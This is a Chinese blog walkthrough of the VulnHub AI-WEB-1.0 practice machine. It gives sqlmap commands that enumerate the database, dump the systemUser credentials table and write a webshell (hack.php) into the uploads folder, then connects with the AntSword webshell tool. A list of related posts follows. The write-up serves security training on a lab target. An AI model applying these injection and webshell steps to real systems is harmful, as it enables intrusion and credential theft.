靶机通关|AI-WEB-1.0 靶机通关攻略

最新推荐文章于 2024-08-01 23:44:38 发布
最新推荐文章于 2024-08-01 23:44:38 发布
阅读量689 收藏 16
点赞数 15
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a96482/article/details/140783709
版权

一、环境准备

1.AI-WEB-1.0靶机

https://www.vulnhub.com/entry/ai-web-1,353/

压缩包解压后,直接双击打开。(注:将靶机连接方式改为NAT模式)

2.kali攻击机

3.蚁剑webshell工具

https://github.com/AntSwordProject/

二、网站查询

1.御剑2014查IP (查询的IP为虚拟网卡vMnet8的IP)

访问网站

2.用扫描目录的工具(御剑无字典大小限制版)扫描当前网站的目录

分别访问roborts.txt,index.html

我们发现robots.txt中有标明目录,我们再去尝试一一访问。

3.继续扫http://192.168.61.129/se3reTdir777/http://192.168.61.129/m3diNf0下目录。

得到http://192.168.61.129/se3reTdir777/index.php与http://192.168.61.129/m3diNf0/info.php

访问http://192.168.61.129/m3diNf0/info.php

http://192.168.61.129/se3reTdir777中发现提交框,开始尝试注入。

三、注入尝试

1.尝试SQL注入

判断是否有SQL注入

在输入框输入

1'   //有报错信息
1    //有结果

2.抓包设置注入点,然后用工具sqlmap去注入

3.查库

python3 sqlmap.py -r '/home/kali/桌面/2.txt' --batch --current-db

库名:aiweb1

4.查表

python3 sqlmap.py -r '/home/kali/桌面/2.txt' --batch -D aiweb1 --tables

表名:user、systemUser

5.查user数据

python3 sqlmap.py -r '/home/kali/桌面/2.txt'--batch -D aiweb1 -T systemUser --dump

得到账号与密码,但是没有登录的地方也没有文件上传的地方。

四、写入木马

由访问http://192.168.61.129/m3diNf0/info.php得文件所处路径。

python3 sqlmap.py -r '/home/kali/桌面/2.txt' --file-write  --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/hack.php

写入成功,使用蚁剑连接。

连接成功,通关完成。

一同吃泥
关注
  • 15
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
AI-Web-1.0靶场
qq_46187131的博客
03-27 1331
1.确认靶机IP 2.端口和目录扫描 3.使用SQLmap进行注入获取shell 4.使用openssl提权。
AI-WEB-1.0简单攻略
在Web和Reverse坑里游泳中。。。。
07-17 2535
AI-WEB-1.0靶机的简单攻略
AI-WEB-1.0
底层社会中的弱智
08-03 628
总结: 报错注入常见的十种,本次用的是updatexml 获取os-sh的条件,具有可写权限的绝对路径需要自己拼接 使用openssl passwd -1 salt xxx xxx构造hash 目标主机为192.168.49.158 攻击kali机为192.168.49.129 前期的信息收集,端口服务,目录扫描,web框架等 端口服务: 只开放80端口且存在两个目录 访问web页面,使用nikto和dirb针对主机和目录进行探测: 主页和前端源码没有提供信息 查看下目录
VulnHub靶场之AI Web 1.0
A_dmin的博客
05-20 613
VulnHub靶场之AI Web 1.0 废话不多说,直接开始实验,都是老套路起步了 用vm打开靶机,运行kali和靶机 首先肯定查看kali的ip地址,然后使用nmap命令:nmap -sP 192.168.80.0/24扫描主机: 找到了靶机的IP地址,接下来进行端口扫描 nmap命令:nmap -p 1-65535 -sV 192.168.80.129 发现只开了一个80端口,我们进行访...
AI-WEB-1.0 靶机
weixin_53736204的博客
07-29 433
下载地址:下载压缩文件打开开启虚拟机。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
vulnhub靶机AI-Web-1.0渗透笔记(文件上传,提权部分各种姿势)
sinat_61654365的博客
01-04 1188
信息收集就略了,nmap就可以了,没有太多知识你会收集到1.网页绝对路径,这里通过sql注入上传文件或者通过sqlmap获取–os-shell会用到2.http://靶场ip/se3reTdir777/index.php#这是一个sql注入页面。
AI-WEB-1.0超详细多方法教程
qq_61988806的博客
10-19 2894
AI-WEB-1.0 多方法渗透
vulnhub靶机AI-Web-1.0渗透笔记
liver100day的博客
06-10 2297
AI-Web1靶机渗透笔记 靶机环境搭建 攻击渗透机: kali IP地址:192.168.75.128 靶机AI-Web1 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/ai-web-1,353/ 渗透过程 1.信息收集 1.1 主机发现 netdiscover 使用这条命令来确认目标靶机IP地址 确认目标靶机IP地址:192.168.75.134 1.2 端口扫描 使用端口扫描神器nmap进行扫描 nmap -T4 -sV -O -A -P- 192.1
AI-WEB-1.0靶机教程
qq_42553928的博客
04-06 6298
文章目录靶机概况下载地址靶机描述Description靶机信息靶机界面网卡信息信息收集主机发现端口扫描命令过程端口详情网站信息网站首页目录爆破敏感目录扫描m3diNf0目录se3reTdir777目录漏洞映射SQLI渗透过程SQLI漏洞利用查看我是谁创建一个名为webshell.php的文件下载文件到靶机运行上传的文件提权 靶机概况 下载地址 https://www.vulnhub.com/entry/ai-web-1,353/ 靶机描述 Description Difficulty: Intermedi
Ai-web-1.0靶机中的骚操作
weixin_51692662的博客
11-05 351
sqlmap、反弹shell、passwd提权、Ai-web-1.0
Vulnhub-Al-Web-1.0 靶机复现完整过程
Continuejww的博客
12-28 1426
在刚才信息收集中我们在robots.txt文件中发现了一个/se3reTdir777/uploads/的路径,并且也读到过phpinfo信息,从info.php文件中我们知道了根目录的路径,那现在就可以在uploads/路径下上传文件,通过sqlmap进行写入一个木马文件。(最明显的位置,最重要的文件,具有读写权限,一般基本可以止于此步骤,因为之前已经拿到了webshell了,直接将信息写入到此文件中)访问此目录,发现页面显示的是PHP有关信息,并且可以看到当前权限用户是最低级的和网站的根目录。
AI-Web-1.0(vulnhub)
2201_75667984的博客
12-05 62
se3reTdir777/uploads/绝对路径为:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/回想到m3diNf0下的info.php中的泄露文件还有一个为泄露的/se3reTdir777/uploads/目录。通过查看m3diNf0下的info.php知道/se3reTdir777/uploads/绝对路径。使用--file--write写入目标位置改名1.php。右击靶机->设置->网络适配器->高级->MAC地址。
VulnhubAI-web 1.0靶机详解
最新发布
weixin_62457642的博客
08-01 786
靶机AI-web1.0速刷
AI-Web-1.0教程
a666666688的博客
07-27 409
靶机安装启动靶机开启kali。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值